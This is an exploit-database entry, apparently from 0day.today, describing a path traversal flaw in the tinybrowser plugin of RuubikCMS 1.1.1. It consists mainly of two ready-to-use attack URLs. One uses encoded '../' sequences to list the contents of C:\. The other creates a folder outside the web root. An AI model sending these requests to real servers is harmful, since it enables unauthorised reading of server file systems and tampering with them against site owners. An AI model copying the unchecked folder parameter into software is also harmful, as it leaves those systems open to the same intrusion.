id: 20859
date: 06/06/2013
title: RuubikCMS 1.1.1  - Path Traversal Vulnerability
author: expl0i13r
cves: 

Following URL will list files and directory names available in "C:\", similarly we can change paths and list respective files
 
http://127.0.0.1/[ruubikcms]/ruubikcms/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder=..%2F..%2F..%2F..%2F..%2F..%2F..%2F&feid=filenameid
 
 
Create Folder :
-----------------
 
By using same path traversal vulnerability we can create folder @ C:\ using below URL
 
http://127.0.0.1/[ruubikcms]/ruubikcms/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder=../../../../../bingo&feid=filenameid

#  0day.today [2023-03-24]  #